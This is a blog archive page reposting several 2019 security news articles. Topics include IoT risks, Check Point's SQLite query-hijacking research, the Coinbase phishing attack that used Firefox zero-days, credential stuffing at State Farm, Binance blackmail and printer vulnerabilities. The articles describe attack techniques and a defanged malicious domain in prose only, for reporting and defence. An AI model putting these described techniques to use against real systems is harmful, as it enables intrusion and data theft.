hacking – Page 276 – STE WILLIAMS

6 Security Considerations for Wrangling IoT

library
crime | hacking | security

The Internet of Things isn’t going away, so it’s important to be aware of the technology’s potential pitfalls.

The year 2020 is fast approaching, and studies estimate that more than 10 billion Internet of Things (IoT) devices will be connected by then. As the number of devices continues to grow, we’re putting ourselves at greater security risk. But despite the vulnerabilities, the general public keeps using and purchasing new devices and has come to have blind trust in them.

According to SAM Seamless Networks, security cameras make up nearly half of the most vulnerable devices, followed by smart home devices Google Home and Amazon Alexa. And vulnerabilities are not just in our homes — the enterprise is at risk also.

The Mirai botnet attacks are still being used to damage corporate networks. Recently, a new IoT bricking worm, malware dubbed Silex, has been hitting Linux-based devices, and it’s designed to permanently disable the hardware it infects, effectively rendering the devices useless.

What Makes IoT So Vulnerable?
The sheer increase in the volume of consumer IoT fostered by retail and tech giants has created a massive attack surface. Consumers may have dozens of IoT devices in their homes. And with all of their variations in software, suppliers, and connection points, the possibilities for things to go wrong seem endless.

For instance, the simple task of turning on your home security system (an IoT device that communicates with a server), driving your car (your phone or car could also be an IoT device), and using a streaming camera at home seems innocuous on their own, but the data may be tracked by various parties, and combining them causes alarming possibilities of potential malicious activity.

To better ensure safety and security, education is needed across the entire IoT ecosystem — from consumers to device manufacturers, service providers, third parties, and developers. Findings show the top reasons for IoT security vulnerabilities include weak passwords, insecure web APIs, cloud and mobile interfaces, insecure third parties, network services, and data transfer to name a few.

What Can Be Done?
Security is only as strong as your weakest link, and we all need to be a bit paranoid in order to get better and for changes to take place. Below are a few considerations to build stronger IoT security:

1. Team mindset: For security to become a priority, it helps to have an entire team that is invested in security. This includes everyone from the CEO and website manager to the developer. When teams and priorities are aligned, budgets and actions are built into short- and long-term goals.

2. Standardization: IoT industry standardization is needed across the board — much like the standards for browsers and websites in the early days of the Internet. Web browsers and websites have evolved a lot over the years, and we are very much in the early stages of IoT.

3. Secure the supply chain: We must hold vendors accountable, but it’s not just about the device itself — supply chain partners are numerous. As we saw with Google Home Nest cameras, third-party service providers were part of the problem that allowed old owners of cameras to spy on new owners.

4. Consumer education: If more people are educated on what could go wrong, they will be more security conscious. If they’re aware of vulnerabilities and issues, they can help prevent attacks. For example, as we saw with the Nest vulnerability, they can make sure their devices are set to factory settings and check for updates to systems on a frequent basis. Educating kids at an early age can also go a long way, just like they’re told to not open the door to strangers. In our modern age, “safety” is still the issue, but the risks have changed. The simple task of installing an application off the Web itself can become the weakest link.

5. Secure applications that support IoT devices: We must ensure that the code and software we build for IoT is continually tested for vulnerabilities. For instance, we can pre-emptively change default passwords of devices, and also manage the patch level of the kernel software on devices to prevent exploitation of new vulnerabilities.

6. Multilayered network security: Many things can be done at the enterprise network level. Segmentation of networks can ensure that hacked IoT devices can’t affect other areas of networks. Perimeter security can help ensure hackers can’t see networks in the first place. Companies should also limit the ability of IoT devices to initiate network connections.

IoT is certainly the Wild West in technology right now, but if we recognize IoT is not going away, and acknowledge its vulnerabilities do create real life safety issues for us, we can raise the awareness, work together across the different layers, and take steps to secure them.

Related Content:

Black Hat USA returns to Las Vegas with hands-on technical Trainings, cutting-edge Briefings, Arsenal open-source tool demonstrations, top-tier security solutions and service providers in the Business Hall. Click for information on the conference and to register.

Prabhu Mohan is a software development leader and innovator with over 20 years of product development and execution expertise covering a wide range of technologies and industry verticals spanning from application security and embedded mobile applications used on millions of … View Full Bio

Article source: https://www.darkreading.com/endpoint/6-security-considerations-for-wrangling-iot/a/d-id/1335411?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

6 Security Considerations for Wrangling IoT

library
crime | hacking | security

The Internet of Things isn’t going away, so it’s important to be aware of the technology’s potential pitfalls.

SELECT code_execution FROM * USING SQLite: Eggheads lift the lid on DB security hi-jinks

library
crime | hacking | security

DEF CON At the DEF CON hacking conference in Las Vegas on Saturday, infosec gurus from Check Point are scheduled to describe a technique for exploiting SQLite, a database used in applications across every major desktop and mobile operating system, to gain arbitrary code execution.

In a technical summary provided to The Register ahead of their presentation, Check Point’s Omer Gull sets out how he and his colleague Omri Herscovici developed techniques referred to as Query Hijacking and Query Oriented Programming, in order to execute malicious code on a system. Query Oriented Programming is similar in a way to return oriented programming in that it relies on assembling malicious code from blocks of CPU instructions in a program’s RAM. The difference is that QOP is done with SQL queries.

SQLite is built into all sorts of things, from web browsers to embedded devices to Android, Windows, iOS, various BSDs, and commercial software. An exploitable security hole found in SQLite would therefore be rather bad news because it could open up lots of stuff to potential attack.

It must be stressed, though, that to pull off Check Point’s techniques to hack a given application via SQLite, you need file-system access permissions to alter that app’s SQLite database file, and that isn’t always possible. If you can change a program’s database file, you can probably get, or already have achieved, code execution on the system by some other means anyway.

Nonetheless, it’s a fascinating look into modern methods of code exploitation, and a neat set of discoveries.

Inside the hack

SQLite databases include a master table that describes the database and its objects. One of the fields in the master table is the Data Definition Language, or DDL, that defines the structure of the SQLite database. And because these DDL statements exist as text in a database file, they can be easily replaced if the file is accessible.

Master table DDL statements, Gull explains in the paper, have to begin with the CREATE command. With that limitation in mind, the researchers found that they could change the CREATE command to a CREATE VIEW command and hijack any future queries. CREATE VIEW, essentially, can be used to trap an app’s legit queries and inject extra commands into them.

With the ability to patch the DDL and have it fire off extra subqueries, there’s the opportunity to interact with vulnerable code within SQLite. In other words, it is possible to alter an SQLite database file so that when it is accessed by an application or operating system, the SQL queries the software wanted to run are intercepted, due to CREATE VIEW, and instead, arbitrary queries that exploit holes within SQLite can trigger instead.

Seeing as SQLite is loaded as a library, or statically built in, once you have code execution in SQLite, you can hijack the running program or operating system component.

Demonstration

Gull and Herscovici chose to focus on Web SQL, an abandoned web API for interacting with client-side databases via a variant of SQL and JavaScript that can still be found in browsers. To demonstrate code execution, they turned to a still-unfixed four-year-old bug, CVE-2015-7036, an untrusted pointer dereference, in SQLite that can be achieved by abusing the fts3_tokenizer() function. Basically, they found it was possible to abuse this function from a hijacked SQL query to defeat ASLR, and hijack the CPU to make it execute arbitrary code.

In another demonstration of the potential of their approach, Gull describes how they replaced the iOS Contacts database, “AddressBook.sqlitedb,” with a malicious version that crashes. Another version could be crafted to potentially achieve code execution within the applications querying the address book, if you’re able to to replace the address book SQLite file.

“Contacts, Facetime, Springboard, WhatsApp, Telegram and XPCProxy are just some of the processes querying it,” Gull explains in his paper. “Some of these processes are more privileged than others. Once we proved that we can execute code in the context of the querying process, this technique also allows us to expand and elevate our privileges.”

The findings, he said, were responsibly disclosed to Apple, which were assigned CVEs (CVE-2019-8600, CVE-2019-8598, CVE-2019-8602, and CVE-2019-8577) and patched in May to close the holes. The SQLite team also patched its software in April. App developers should ensure they push a build of their software that includes the updated database code to users in order to protect them.

“Given the fact that SQLite is practically built-in to almost any platform, we think that we’ve barely scratched the tip of the iceberg when it comes to its exploitation potential,” Gull concludes. ®

Sponsored:
Balancing consumerization and corporate control

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/08/10/memory_corruption_sqlite/

Anatomy of an attack: How Coinbase was targeted with emails booby-trapped with Firefox zero-days

library
crime | hacking | security

Coinbase chief information security officer Philip Martin this week published an incident report covering the recent attack on the cryptocurrency exchange, revealing a phishing campaign of surprising sophistication.

The thwarted attack began with email messages on May 30 to more than a dozen Coinbase employees that appeared to be from Gregory Harris, a research grant administrator at the University of Cambridge in the UK.

At some point prior to that, the attackers – a group known to Coinbase as CRYPTO-3 or sometimes HYDSEVEN – compromised or created two email accounts at Cambridge. Two days before the initial emails went out, they registered a domain to deliver their exploit, Martin said.

These messages represented reconnaissance for a phishing campaign that extended beyond Coinbase. After corresponding with the initial set of targets – about 200 – through a series of messages over several weeks, the hackers winnowed their list of prospective victims down to five specific marks. These individuals – macOS users not using Firefox – received messages with malicious links.

“Stage one of this attack first identified the operating system and browser, and displayed a convincing error to macOS users who were not currently using Firefox, instructing them to install the latest version from Mozilla,” Martin wrote. “After visiting the page in Firefox, the exploit code was delivered from a separate domain, analyticsfit[.]com, which was registered on May 28.”

The exploit payload used two Firefox zero-day vulnerabilities, a JavaScript privilege escalation flaw (CVE-2019–11707) and a browser sandbox escape (CVE-2019–11708), now patched by Mozilla. According to Martin, the latter vulnerability was discovered simultaneously by Samuel Groß, a security researcher with Google’s Project Zero, and someone in the attack group or someone who provided it to them.

Digi-dosh exchange Coinbase: Someone tried to pwn our staff via this week’s Firefox zero-day security hole

Martin also observed that the privilege escalation flaw had existed for a while in Firefox but only became exploitable using the chosen attack technique as of May 12 due to an unidentified technical change.

“This indicates a very rapid discovery-to-weaponization cycle on the part of the attacker (or whoever the attacker acquired the 0-day from),” said Martin, noting that the exploit code itself was well-structured, as might be expected from experienced malware authors.

Using those two vulnerabilities to achieve arbitrary code execution, the attacker’s shellcode issued a curl command to download and run the stage-one implant, a Netwire variant. Used for reconnaissance and credential theft on victims’ machines, the malicious code was detected by Coinbase at this point based on unusual behavior, specifically Firefox spawning a shell.

The stage-one payload then transitioned to a stage two implant, identified by Martin as a variant of the Mokes malware family. It’s a remote access trojan (RAT) and was operated under direct human control. Martin speculates that the attackers moved to stage two when they believed they had compromised a target of value.

Once aware of the hack, Coinbase’s security team collected data artifacts related to the break-in, revoked affected credentials, and contacted Mozilla’s security team, which managed to create patches shortly thereafter.

Martin attributed Coinbase’s successful response to the attack to a security-first culture, detection and response tooling, and clear incident response playbooks. Sharing information about such incidents, he suggests, will help the crypto-finance industry. ®

Sponsored:
Balancing consumerization and corporate control

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/08/09/coinbase_pwned/

State Farm Reports Credential-Stuffing Attack

library
crime | hacking | security

The insurer has informed customers a third party used a list of user IDs and passwords to attempt access into online accounts.

US insurance firm State Farm has confirmed a credential-stuffing attack. In a letter to customers, the company reports a so-called “bad actor” used a list of user IDs and passwords obtained from outside sources to attempt to gain access to State Farm online accounts.

As part of the attack, the actor was able to confirm a valid username and password for affected accounts. No sensitive personal information was viewable, State Farm says, and no fraud has been detected. It has reset passwords to block future malicious activity by the same attacker.

In its notification letter, the insurer urges users to change passwords as soon as possible and to reset the password for other accounts that share the same one. Customers are encouraged to monitor their accounts and credit reports for the next one to two years and report suspicious activity to law enforcement, including the Federal Trade Commission and attorney general.

New Vulnerability Risk Model Promises More-Efficient Security

library
crime | hacking | security

Taking into account more factors than the current CVSS makes for a better assessment of actual danger.

BLACK HAT USA 2019 – Las Vegas – Vulnerabilities happen. There’s nothing new or mysterious about that. Neither is there mystery around the fact that something must be done to address vulnerabilities. But out of the thousands of common vulnerabilities and exploits (CVEs) discovered each year, which ones should receive a company’s attention? That question — and a data-based answer — were the topic of a talk on Thursday at Black Hat USA.

The session, Predictive Vulnerability Scoring System, was presented by Michael Roytman, chief data scientist at Kenna Security, and Jay Jacobs, a security data scientist at Cyentia Institute. In it, they described vulnerability management as the “wicked problem” because management of vulnerability doesn’t scale to the volume of vulnerabilities.

They pointed to the statistic that about 10% of vulnerabilities are patched each month, a percentage that doesn’t change with the quantity of vulnerabilities exposed. There are too many vulnerabilities for any organization (or collection of organizations) to patch them all, so “we need a strategy to fix what matters.”

The key to the strategy is figuring out “what matters.” In theory, the Common Vulnerability Scoring System (CVSS) should help: The higher the score, the greater the risk. Unfortunately, anything ranked 7 or above is considered critical, and, Roytman and Jacobs said, “CVSS is DoS-ing your patching policy and wasting your money.”

The reason that the researchers say patching for all critical vulnerabilities amounts to a waste is that only 2% to 5% of critical vulnerabilities are ultimately found to be exploited in the wild. For greatest efficiency, then, a scoring system would take into account the factors that make it more likely a vulnerability will be exploited. That system is what the researchers demonstrated from the stage.

The Exploit Prediction Scoring System (EPSS) uses more than a dozen different factors in a model to predict the likelihood that a particular vulnerability will be exploited, and therefore should be given a higher remediation priority. Those factors include things like the CVE, CVSS score, exploits shown in proof-of-concepts, exploits in the wild, and tags for operating systems, vendors, and other variables. The methodology doesn’t require that every factor be entered before a result is generated, but the researchers said that the answer becomes more accurate with each additional factor.

The result is a percentage — the higher the percentage, the more likely it is that the vulnerability will be exploited in the wild, and the more important it is that the vulnerability be patched or remediated quickly.

Roytman and Jacobs said that they will be making their methodology available as both an algorithm that can be configured and implemented by others and as an online calculator into which users can plug in data for an answer on any given CVE. As of the posting of this story, the URL for the calculator (http://kennaresearch.com/tools/epss-calculator) was not yet active, but they said that the page, which will also include the white paper explaining the research that led to the new model, will be available soon after the conclusion of Black Hat.

Related Content:

Curtis Franklin Jr. is Senior Editor at Dark Reading. In this role he focuses on product and technology coverage for the publication. In addition he works on audio and video programming for Dark Reading and contributes to activities at Interop ITX, Black Hat, INsecurity, and … View Full Bio

Article source: https://www.darkreading.com/risk/new-vulnerability-risk-model-promises-more-efficient-security/d/d-id/1335489?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Blackmailed for Bitcoin – exchange rebuffs $3.5m ransom demand

library
crime | hacking | security

Cryptocurrencies are a big deal once again, now that Bitcoin is back over $10,000.

You might think that’s good news for cryptocurrency exchanges, which are businesses that let you trade regular money, such as Euros, Dollars and Pounds, into and out of so-called virtual currencies like Bitcoin, Monero and Dogecoin.

But it’s not all plain sailing – cryptocurrency companies are of particular interest to cybercrooks, and not only for the cryptocoins they hold.

Here’s a story of super-sized digital blackmail aimed at one of the biggest exchanges out there.

KYC

As you probably know, business are supposed to make an effort to know their customers (and their suppliers) these days, as a way of making money laundering more difficult.

And know-your-customer (KYC) rules are particularly important for banks and other businesses, including cryptocoin exchanges, that let people put in money at one end, shuffle it around a bit, or even a lot, and later extract it at the other.

The problem with KYC rules is that they force companies to collect and keep personal data that both you and they would much rather not send across the internet – for example, bills that prove your address, bank statements that vouch for the source of your money, scans of your passport to confirm your identity, and more.

Ironically, the stuff that you’re expected to keep confidential to keep it out of the hands of cybercrooks and to make identity theft harder…

…that’s the very stuff that you now have to share electronically with an ever-increasing number of online business, who are forced to demand it just in case you turn out to be a cybercrook yourself.

(If you’ve ever needed to recover a social media account after having your password hacked, you’ve probably, and understandably, had to jump through “prove thyself” hoops that involved sending over the internet exactly the sort of data you wouldn’t usually dream of sending over the internet.)

Collect and store

Now imagine that you’re a cryptocurrency exchange.

Not only do you manage a whole pile of online accounts and cryptocoin wallets (free money!) that cybercrooks would love to get their paws on, you also have a cupboard full of seriously personal data about your customers (free identities!) that the crooks would love just as much.

After all, in the event of a password breach, you can always change your password, and as long as you do it before the crooks get round to trying your old one, you’ve essentially solved the problem.

But it’s much harder to get a new passport, almost impossible to get a new Social Security or National Insurance number, and entirely impossible to get a new birthday.

Give us money or else…

One of the world’s biggest cryptocurrency exchanges, Binance, is currently facing a blackmail saga in connection with alleged KYC data.

Simply put, a crook is claiming to have stolen KYC data on some 10,000 Binance customers, and wants a blackmail payment of BTC 300 (currently about $3,500,000) not to publish it.

It’s kind of like sextortion, where the crooks threaten to reveal personal information about you unless you pay up, except that this time it’s not up to you to pay the money, but up to someone else.

As you probably know, sextortion scams (they get that name because the data they threaten to leak is usually of a sexual or prurient nature) try to convince you that the threat is real by including sample data that “proves” you were hacked, such as a phone number or password.

But sextortion scams are almost always totally bogus – the “proof” comes from an earlier data breach, and that’s all the crooks have got.

The “proof” means nothing, and the rest of the scary story about the sexy data they have on you is made-up.

In Binance’s case the concern isn’t that the photos are of a sexy sort, but of an identificational sort – as you can imagine, they’re not the kind of pics that might embarrass you, but rather the kind that might put you at risk of identity theft.

But do the images really exist in the volume claimed, and did the “proof” samples already seen by Binance really come from a breach at the company?

We won’t pay!

Binance has now publicly stated its opinion that the photos it has seen so far – the “proof” offered by the crooks – did not come from Binance’s KYC data.

The images, says Binance, don’t contain any obvious signs of the digital watermarks that the company claims to add to all the image data it keeps.

Digital watermarks aren’t perfect for proving that a picture didn’t come from you, because proving a negative is almost always very hard.

Neverthelesss, even though image files are easily transcoded, adapted, scaled, reprocessed and so on to disguise their true origin, watermarks do provide some sort of guide to the source (or otherwise) of a photo.

That has led Binance to form the opinion that, whether the crooks have as much data as they say or not, it didn’t come from a Binance breach:

When asked to prove the source of the data, the individual demanded 300 BTC and refused to supply irrefutable evidence of their findings. Later, they went to the press under false pretenses, posing as a white hat with good intentions. The relevant law enforcement agencies have been contacted and we will be working closely with them to pursue this person.

Of course, regardless of where the data came from, Binance paying up wouldn’t stop the crooks dumping any data they have anyway.

So the company has taken a different tack, offering to pay someone to expose the crooks, instead of dealing with the crooks themselves:

If you are able to provide any information to help identify this person and allow us to pursue the individual through legal action, we will offer a reward of up to 25 BTC [about $300,000], dependent on the relevance of the data supplied.

What to do?

As Binance has wryly implied, this sort of incident offers other cybercrooks a very believable phishing lure – “Hey, you’re a Binance customer and I just happen to be here to help in these tricky times.”

So the company has warned as follows:

Please be wary of any fraudsters who may impersonate Binance customer service and request you to withdraw your funds.

That’s good advice – and not just for Binance but for all your online accounts.

By the way, digital blackmail attacks like this, such as the sextortion scams we mentioned above, don’t just happen to companies – they can happen to you as an individual, too.

The subject matter may be different – sexy pics rather than KYC data – but the criminality is the same: you’re supposed to send money for the crooks not to do something, even though paying up wouldn’t stop them doing it anyway, and wouldn’t stop them coming back with more threats later.

Watch our video for advice on what to do:

(Watch directly on YouTube if the video won’t play here.)

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/wjsAyiwmQzo/

So you can’t find enough cyber-security experts to join the team. Time to dial a managed security service provider?

library
crime | hacking | security

Backgrounder Managed security services are – by revenue – the fastest expanding field of cyber security, according to IDC, which reckons they should grow at a compound annual growth rate of 14.2 per cent to 2022. Gartner says managed and subscription-based security services will account for half of all cyber-security spending by 2020.

Other than the proliferation of cyber security threats that companies routinely have to combat on a daily basis, there are two major drivers.

One is the continuing global shortage of cyber-security professionals that makes skilled staff difficult to find and expensive to hire. The number of respondents reporting problematic shortage of cyber security skills according to a survey conducted by ESG Group in 2018-2019 was 53 per cent, up from 51 per cent in 2017-2018, and 45 per cent in 2016-2017.

As we find it harder to employ security staff, so it becomes practical to outsource cyber-security to those who have managed to snag themselves some experts.

The second driver comes from the need to comply with more stringent data privacy legislation, notably the European Union General Data Protection Regulation (GDPR) that came into force in May 2018. Rather than go it alone, many have put their trust in managed security service providers (MSSPs), who they hope will have the knowledge and experience to help them avoid a costly data breach.

What’s on offer from MSSPs?

Thanks to the rising challenges and growth in cloud-hosting, managed security service providers have evolved to provide a broad range of tools over and above the provision and administration of firewall and intruder detection and prevention systems that defined managed security services (MSS) some years ago. MSSPs routinely deliver a wealth of common security functions that include antivirus and spyware detection, web and email content filtering, endpoint protection, identity access management, virtual private network connectivity, and data encryption, to name just a few. Combinations are bundled into subscriptions that integrate software licenses, hardware rentals and access to management portals.

Patch management and upgrades are staple features of managed security services, along with monitoring and alerting tools for threat detection and weekly security reports. These use data from security logs across networks, devices, applications, and other systems, and they scan for evidence of foiled attacks and proof of suspicious activity from internal and external players. Consulting is also part of the modern mix: identifying security vulnerability and risk assessment using, for example, penetration testing and/or red-team ethical hacking processes to test existing defenses.

What not to expect

And that’s what you get on the tin. Just don’t expect to get everything included as standard.

For example, services like remediation are not always built in to your managed security service as a standard. Rather, the work of cleaning up identified security threats usually comes as a premium option, something that may be beyond the budget and requirement of the average SMB. In most cases, the MSSP will just inform you if it has discovered some vulnerabilities or if a cyber-attack is imminent or underway. They will then leave you to figure out how best to remediate the threat, often hoping to generate additional business should you need to call upon them as the cavalry.

This can be a bit of cold-water shock. As Gartner noted in its Q2 2019 Magic Quadrant for managed security services, monitoring is one thing, remediation quite another. “For other organisations that have little-to-no security team and a lower security operations maturity, the expectations are that the MSSP will do more than just issue an alert and let the customer fend for itself,” it stated. “They need the MSSP to take an active role in analysing, triaging, and then disrupting or containing the threat, i.e. they need the MSS to act as a first-level incident responder for them.”

Access to qualified security analysts can also be minimal. Skilled staff are at a premium with MSSPs, too, so providers will limit the time they spend on the phone to ensure their precious people are held back to help only the most complex issues. Buyers should therefore check whether their service provision includes access to an actual analyst or if they are limited to automated reports delivered to their inboxes.

Similarly, don’t think that the MSSP’s engineers will come a knocking when there’s a technical problem. Though this can probably be arranged as part of a supplemental deal, and fee, the advantage of having all those security tools hosted centrally is the MSSP doesn’t have to leave their own data center to apply patches and upgrades and reconfigure services. Everything can be done through remote access.

How to choose an MSSP

That’s the pitch, and you know what to beware. How, then, should you choose an MSSP?

It’s important to find an MSSP that is flexible enough to offer a customized service that can fit your budget. The thing to understand is that not all of the bigger providers will deliver MSS as a standalone service without requiring parallel spending by you on their accompanying security products. Such services often come courtesy of specialist hardware and software suppliers who have a portfolio of existing security products they want to “add value” to. It’s therefore worth noting that there exists a whole range of other MSSPs. Some of these have converted from generic managed service providers and value-added resellers, and are able to mix and match different services from different providers to offer a more flexible set of options according to scale, performance, and budget.

Product resale constitutes an important part of the revenue stream here, so you need to make a close assessment of where your potential provider is offering something of genuine value, or whether they are simply trying to cut out the middleman so that you take on their products faster.

Having navigated that, what are the characteristics to look for in a managed service?

Ease of use is vital. So look for a provider with a web portal that provides access to threat intelligence and activity reports presented in an easy-to-digest format and that will, ideally, also give assessments of compliance status. The availability of APIs between on- and off-premises tools means MSSPs can feed security monitoring information into other systems and compliance management applications. This is another plus.

Something else to look for is security incident and event management that offers network visibility, email security, threat detection, log management, alerting and compliance reporting under one service. The full package may be too complex and unwieldy for smaller companies, but lighter versions that replicate some of the same functionality will be easier to implement, to manage and to finance.

Not everybody will want or need access to security analysts, but some will like to have the option to occasionally discuss threats with a professional. In that case, make sure your MSSP has sufficient staff expertise, and has a security operations centres that can deliver round-the-clock monitoring and alerting. Make sure that the MSSP’s skills and professed knowledge matches their own systems architecture and regulatory obligations and, where needed, are tailored to the compliance requirements of specific verticals, such as in finance.

The fine print of any contract will be critical, especially service level agreements that will commit the provider to defined response times to things like applying security patches to systems. It can also be a good idea to integrate some form of cyber-security insurance and make sure both sides understand where their respective responsibilities lie for any data breach, particularly when deciding where sensitive information is stored (by country or legal jurisdiction) and how it is processed.

MSSPs are a growing force in IT. While they are certainly expedient, choosing a supplier wisely is important given the complexity and risks involved. Before you enter any relationship, ensure you have a clear understanding of your own requirements, that you have fully vetted the supplier and that you understood their service offering. Finally, set out the terms of the ongoing relationship. Do all that from the outset, and you will hopefully save yourself headaches down the line.

Supported by SonicWall.

Sponsored:
Balancing consumerization and corporate control

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/08/09/smb_security/

Significant Vulnerabilities Found in 6 Common Printer Brands

library
crime | hacking | security

In a half-year project, two researchers tested six of the top enterprise printer brands and found vulnerabilities in every device, some of which allow remote execution.

A pair of researchers conducting a six-month survey of popular business printers discovered 49 vulnerabilities in the drivers and software running on the devices. Some of the issues could be remotely exploited to run code on the corporate technology, security firm NCC Group said on August 8.

The research, conducted by NCC researchers Mario Rivas and Daniel Romero, uncovered issues as mild as denial-of-service vulnerabilities and as serious as buffer overflows that could lead to remote code execution. The researchers notified the makers of the affected printers — from Brother, HP, Kyocera, Lexmark, Ricoh and Xerox — of the issues in February, and every manufacturer has patched the issues, NCC stated.

The researchers will walk hackers through their research — including threat modeling and how attackers could use printers to maintain persistence in a corporate network — at the DEF CON hacking conference in Las Vegas this weekend.

“Because printers have been around for so long, they’re not seen as enterprise IoT devices — but they’re embedded in corporate networks and therefore pose a significant risk,” Matt Lewis, research director at NCC Group, said in a statement. “Building security into the development life cycle would mitigate most if not all of these vulnerabilities.”

Printers have long been a target of vulnerability researchers and hackers. At the Black Hat Security Briefings in 2002, two security researchers demonstrated that HP printers could be remotely exploited using security weaknesses in a variety of access methods. In 2017, a graduate thesis presented a survey of the security flaws in printers and multifunction devices, identifying more than 125 printer vulnerabilities in the National Vulnerability Database dating back nearly 20 years.

Increasingly, printers are grouped into the broader class of Internet of Things (IoT) devices that can expose companies to attack.

“Printers are commonly overlooked as devices that just ‘print’ and not as the network devices they are, which implement a lot of capabilities and store really sensitive information — not only documents, but also domain credentials and other secrets,” Romero and Rivas said in an e-mail interview. “For this reason, we think that they are very interesting targets for attackers using them as the front door to compromise an organization.”

Using some custom automated tools, the NCC Group research uncovered 49 vulnerabilities, as identified by their Common Vulnerability Enumeration (CVE) numbers. The researchers made extensive use of protocol fuzzing and plan to discuss one of their fuzzers at their DEF CON talk.

“We focused our research on [certain] attack surfaces, such as specific printer protocols, services, or implementations,” the researchers told Dark Reading. “This is the reason why the different types of printer vulnerabilities found were often common across different brands. As far as we were able to identify, there weren’t common components between the different brands.”

Brother printers had the fewest vulnerabilities, with three issues found, including two overflows and an information disclosure vulnerability. HP printers had five issues, including multiple buffer overflows, cross-site scripting, and a bypass for countermeasures implemented to prevent cross-site request forgery.

Xerox and Lexmark printers had eight and nine vulnerabilities, respectively, including multiple buffer overflows, cross-site scripting, and information disclosure. Both Ricoh and Kyocera printers had a dozen vulnerabilities each. All four of the most vulnerable printer brands lacked countermeasures to prevent cross-site request forgery.

The researchers noted that they only had time to determine the definite exploitability of a few of the issues.

NCC Group criticized the shortfalls in the security measures implemented by printer manufacturers’ software development teams.

“It’s very important that manufacturers continue to invest in security for all devices, just as corporate IT teams should guard against IoT-related vulnerabilities with even small change: changing default settings, enforcing secure configuration guides, and regularly updating firmware,” Lewis said.

Businesses should pay more attention to their printers as potential points of attacks and as devices that could allow an attacker to stay resident inside a network, the NCC Group researchers said.

Related Content

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT’s Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline … View Full Bio

Article source: https://www.darkreading.com/vulnerabilities---threats/significant-vulnerabilities-found-in-6-common-printer-brands/d/d-id/1335485?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

7 Online Safety Tips for College Students

library
crime | hacking | security

Heading back to campus soon? Here are seven tips that will get your digital house in order and keep you safe online this semester.

Image Source: Adobe Stock: Monkey Business

Parents naturally worry about their kids leaving for college – their physical safety high on the list. But in the digital world, college students are at risk, too, in the forms of identity theft and online fraud.

According to the FTC’s “Consumer Sentinel Network Data Book,” released in February, much of the crime revolves around fraudulent wire transfers or attacks on credit cards and gift cards. The FTC found reports of fraud around student loans increased by 119% in 2018. In addition, 43% of younger people ages 20 to 29 reported losing money to fraud compared with only 15% of those ages 70 to 79.

The good news: There are many practical steps students can take to protect themselves online.

It starts with some real-life common sense. “Student should physically lock down their laptops when they are not in their dorm rooms, and keep sensitive information, such as Social Security cards and birth certificates, locked in a safe,” says Paige Hanson, chief of identity education for Norton LifeLock.

Next on the online-safety list? Read on.

Steve Zurier has more than 30 years of journalism and publishing experience, most of the last 24 of which were spent covering networking and security technology. Steve is based in Columbia, Md. View Full Bio

Article source: https://www.darkreading.com/7-online-safety-tips-for-college-students/d/d-id/1335481?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple